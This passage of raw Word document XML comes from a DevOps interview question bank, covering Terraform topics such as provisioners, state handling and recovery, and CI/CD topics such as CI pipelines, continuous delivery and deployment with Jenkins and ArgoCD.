          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Terraform data source reads existing information from a provider without managing that resource. It is used to reference existing images, networks, secrets, projects, and other external values.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Data Source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Q488. Explain Terraform provisioners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform provisioners run scripts or commands during resource creation or destruction. They are a last resort because they can make infrastructure less declarative and harder to reproduce.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Provisioners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Q489. What are null resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: null_resource is a Terraform resource with no real infrastructure object, often used with triggers and provisioners. It should be used sparingly because it can hide imperative logic inside Terraform.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Null Resources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Q490. Explain local-exec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: local-exec is a provisioner that runs a command on the machine executing Terraform. It is useful for limited automation but should not replace proper configuration management or deployment tools.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Local-exec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Q491. What is remote-exec?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: remote-exec runs commands on a newly created remote resource over SSH or WinRM. It can bootstrap instances, but immutable images or configuration management are usually cleaner.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Remote-exec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Q492. Explain bootstrap scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Bootstrap scripts initialize systems by installing packages, configuring services, or registering agents. They should be idempotent, logged, and minimized in favor of baked images or managed services.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bootstrap Scripts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Q493. What is Terraform state encryption?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform state encryption protects state data at rest in the backend. Use encrypted storage, strong IAM, audit logs, and avoid storing unnecessary secrets in state.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform State Encryption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Q494. Explain backend migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Backend migration moves Terraform state from one backend to another. It requires backups, locking awareness, terraform init -migrate-state, and validation before production use.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Backend Migration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Q495. What are Terraform workspaces use cases?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform workspaces are useful for simple environment separation, testing variants, or multiple state instances from one configuration. For complex production environments, separate state backends are often clearer.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Workspaces Use Cases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Q496. Explain state sharing issues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: State sharing issues occur when multiple teams or modules depend directly on the same state file. Use remote outputs carefully, avoid broad access, and prefer clear module interfaces or data sources.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>State Sharing Issues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Q497. What is IaC governance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IaC governance standardizes how infrastructure is reviewed, deployed, secured, and audited. It includes module standards, policy as code, state controls, access management, and drift detection.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>IaC Governance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Q498. Explain infrastructure compliance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Infrastructure compliance ensures resources meet security, regulatory, and internal standards. It is enforced through IaC scanning, cloud policies, audit logs, tagging, encryption, and access reviews.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infrastructure Compliance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Q499. What are common Terraform failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common Terraform failures include provider auth errors, state locks, drift, quota limits, dependency cycles, invalid variables, failed partial applies, state corruption, and provider version mismatches.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Common Terraform Failures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Q500. Explain Terraform recovery strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform recovery strategies include state backups, lock cleanup, refresh-only plans, import, state mv/rm, rollback commits, targeted repair with caution, and restoring from known-good state.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Recovery Strategies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Q501. What is declarative infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Declarative infrastructure defines the desired end state rather than each manual step. Tools such as Terraform decide the actions needed to reach that state.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Declarative Infrastructure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Q502. Design enterprise-grade Terraform architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: To design design enterprise-grade terraform architecture, start by clarifying requirements, scale, users, latency, availability, security, compliance, and cost constraints. Then describe the main components, data flow, scaling approach, failure handling, observability, CI/CD or IaC automation, security controls, and rollback or disaster-recovery strategy.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Design Enterprise-grade Terraform Architecture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pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>CI/CD &amp; GitOps (261–360)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q503. Explain CI pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Explain CI Pipeline</w:t>
        <w:br/>
        <w:t>A Continuous Integration (CI) Pipeline is an automated workflow that validates code changes whenever developers commit code to a shared repository.</w:t>
        <w:br/>
        <w:t>Its primary goal is to detect bugs early, maintain code quality, and ensure the application is always in a deployable state.</w:t>
        <w:br/>
        <w:t>CI Pipeline Flow</w:t>
        <w:br/>
        <w:t>Developer Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Source Code Repository (GitHub/GitLab)</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Code Checkout</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Run Unit Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Code Quality &amp; Security Scans</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Package Artifact / Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>Store Artifact</w:t>
        <w:br/>
        <w:t xml:space="preserve">       |</w:t>
        <w:br/>
        <w:t xml:space="preserve">       v</w:t>
        <w:br/>
        <w:t>CI Success/Failure Notification</w:t>
        <w:br/>
        <w:t>CI Pipeline Stages</w:t>
        <w:br/>
        <w:t>1. Code Commit</w:t>
        <w:br/>
        <w:t>Developers push code to a Git repository.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>git add .</w:t>
        <w:br/>
        <w:t>git commit -m "Added login feature"</w:t>
        <w:br/>
        <w:t>git push origin main</w:t>
        <w:br/>
        <w:t>2. Source Checkout</w:t>
        <w:br/>
        <w:t>The CI tool fetches the latest code from the repository.</w:t>
        <w:br/>
        <w:t>3. Build Stage</w:t>
        <w:br/>
        <w:t>The application is compiled and dependencies are installed.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Java: Maven/Gradle</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Python: pip</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Node.js: npm</w:t>
        <w:br/>
        <w:t>4. Automated Testing</w:t>
        <w:br/>
        <w:t>Tests are executed to verify functionality.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Unit Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Integration Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * API Tests</w:t>
        <w:br/>
        <w:t>If any test fails, the pipeline stops.</w:t>
        <w:br/>
        <w:t>5. Code Quality Checks</w:t>
        <w:br/>
        <w:t>Static analysis tools check code quality and coding standards.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SonarQube</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ESLint</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pylint</w:t>
        <w:br/>
        <w:t>6. Security Scanning</w:t>
        <w:br/>
        <w:t>Security vulnerabilities are identified before deployment.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * SAST (Static Application Security Testing)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Dependency Scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container Image Scanning</w:t>
        <w:br/>
        <w:t>Tools:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Trivy</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Snyk</w:t>
        <w:br/>
        <w:t>7. Package Creation</w:t>
        <w:br/>
        <w:t>The application is packaged as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * JAR/WAR</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * ZIP</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker Image</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker build -t app:v1 .</w:t>
        <w:br/>
        <w:t>8. Artifact Storage</w:t>
        <w:br/>
        <w:t>Build artifacts are stored in repositories.</w:t>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * JFrog Artifactory</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Nexus Repository</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Container Registries</w:t>
        <w:br/>
        <w:t>9. Notification</w:t>
        <w:br/>
        <w:t>Developers receive pipeline status notifications via email, Slack, or Teams.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example (DevOps/MLOps)</w:t>
        <w:br/>
        <w:t>In a Kubernetes project:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Developer pushes code to GitHub.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Jenkins triggers the CI pipeline.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Maven builds the application.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Unit tests run.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. SonarQube performs code analysis.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Trivy scans the Docker image.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               7. Docker image is built and tagged.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               8. Image is pushed to a container registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               9. CD pipeline deploys it to GKE/EKS.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of CI Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Early bug detection</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster feedback</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Improved code quality</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced integration issues</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automated testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent builds</w:t>
        <w:br/>
        <w:t>Interview Answer (2 Minutes)</w:t>
        <w:br/>
        <w:t>A CI pipeline is an automated workflow that runs whenever code is committed to a version control system. It typically includes source checkout, build, automated testing, code quality checks, security scanning, packaging, and artifact storage. The objective is to identify issues early and ensure that every code change is validated before moving to deployment stages. In my experience, I have used Jenkins and GitHub Actions to build CI pipelines that compile applications, run tests, perform SonarQube quality checks, scan Docker images with Trivy, and publish artifacts for deployment to Kubernetes environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q504. What is CD?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is CD?</w:t>
        <w:br/>
        <w:t>CD stands for Continuous Delivery or Continuous Deployment. It is the practice of automatically releasing validated code changes after the CI process completes successfully.</w:t>
        <w:br/>
        <w:t>The goal of CD is to make software releases faster, safer, and more reliable.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Continuous Delivery</w:t>
        <w:br/>
        <w:t>In Continuous Delivery, the application is automatically:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Built</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Tested</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Packaged</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Deployed to staging/UAT</w:t>
        <w:br/>
        <w:t>However, deployment to production requires manual approval.</w:t>
        <w:br/>
        <w:t>Flow</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>CI Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Build &amp; Test</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Create Artifact</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Staging</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Manual Approval</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Production</w:t>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>A developer commits code:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Jenkins builds the application.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Tests pass.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Docker image is created.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Image is pushed to a registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Application is deployed to staging.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Release manager approves deployment.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               7. Production deployment starts.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Continuous Deployment</w:t>
        <w:br/>
        <w:t>In Continuous Deployment, every successful change is automatically deployed to production.</w:t>
        <w:br/>
        <w:t>Flow</w:t>
        <w:br/>
        <w:t>Code Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>CI Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Build &amp; Test</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Create Artifact</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Staging</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ↓</w:t>
        <w:br/>
        <w:t>Deploy to Production Automatically</w:t>
        <w:br/>
        <w:t>No manual approval is required.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Continuous Delivery vs Continuous Deployment</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous Delivery</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual Approval</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual Trigger</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Automatic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Risk Level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Release Speed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fast</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Fastest</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common CD Tools</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitLab CI/CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Spinnaker</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>CD in Kubernetes</w:t>
        <w:br/>
        <w:t>Typical deployment flow:</w:t>
        <w:br/>
        <w:t>GitHub</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Jenkins CI</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Container Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>ArgoCD</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ↓</w:t>
        <w:br/>
        <w:t>Kubernetes (GKE/EKS/AKS)</w:t>
        <w:br/>
        <w:t>ArgoCD continuously watches Git repositories and syncs Kubernetes clusters to the desired state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1–2 Minutes)</w:t>
        <w:br/>
        <w:t>CD stands for Continuous Delivery or Continuous Deployment. It is the process of automatically releasing software after the CI pipeline successfully builds and validates the code. In Continuous Delivery, deployments to production require manual approval, whereas in Continuous Deployment, successful changes are automatically deployed to production. CD helps organizations release software faster, reduce deployment errors, and maintain consistent environments. In my projects, I have used Jenkins, GitHub Actions, Docker, Kubernetes, and ArgoCD to automate application deployments across staging and production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q505. Explain continuous deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Continuous Deployment?</w:t>
        <w:br/>
        <w:t>Continuous Deployment is a software delivery practice where every code change that passes all automated tests and quality checks is automatically deployed to production without any manual intervention.</w:t>
        <w:br/>
        <w:t>It is the final stage of CI/CD automation.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>Developer Commit</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Build Application</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Run Automated Tests</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Code Quality Checks</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Security Scans</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Create Artifact/Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ↓</w:t>
        <w:br/>
        <w:t>Deploy to Production Automatically</w:t>
        <w:br/>
        <w:t>If all stages succeed, the application is released to users immediately.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example</w:t>
        <w:br/>
        <w:t>Suppose a developer fixes a bug and pushes code to GitHub:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. CI pipeline is triggered.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Application is built.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               3. Unit and integration tests run.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               4. Security and quality scans pass.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               5. Docker image is created and pushed to a registry.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               6. Kubernetes deployment is updated automatically.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               7. Users receive the new version without any manual approval.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Faster release cycles</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced manual effort</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Immediate delivery of features and fixes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Lower deployment risk through small, frequent changes</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Consistent and repeatable deployments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Requires strong automated testing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rollback mechanisms must be in place</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Monitoring and alerting are critical</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Defective code can reach production if tests are insufficient</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Techniques Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Canary Deployment – release to a small percentage of users first.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Blue-Green Deployment – switch traffic between two environments.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Rolling Updates – gradually replace old application instances.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Automatic Rollback – revert if health checks fail.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tools Commonly Used</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Argo CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Jenkins</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitLab CI/CD</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Spinnaker</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example (Kubernetes)</w:t>
        <w:br/>
        <w:t>Developer Pushes Code</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>GitHub Actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Build Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Push to Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>ArgoCD Detects Change</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Deploy to GKE/EKS</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Health Checks Pass</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ↓</w:t>
        <w:br/>
        <w:t>Release Live</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (1 Minute)</w:t>
        <w:br/>
        <w:t>Continuous Deployment is a DevOps practice where every code change that successfully passes build, testing, quality, and security checks is automatically deployed to production without manual approval. It enables rapid and frequent software releases while reducing human intervention. To implement Continuous Deployment effectively, organizations need comprehensive automated testing, monitoring, and rollback mechanisms. In Kubernetes environments, tools such as Jenkins, GitHub Actions, Docker, and ArgoCD are commonly used to automate the entire deployment lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q506. What is continuous delivery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Continuous Delivery?</w:t>
        <w:br/>
        <w:t>Continuous Delivery (CD) is a software development practice where every code change is automatically built, tested, and prepared for release to production. However, the final deployment to production requires manual approval.</w:t>
        <w:br/>
        <w:t>The goal is to ensure that the application is always in a deployable state.</w:t>
        <w:br/>
        <w:t>________________</w:t>
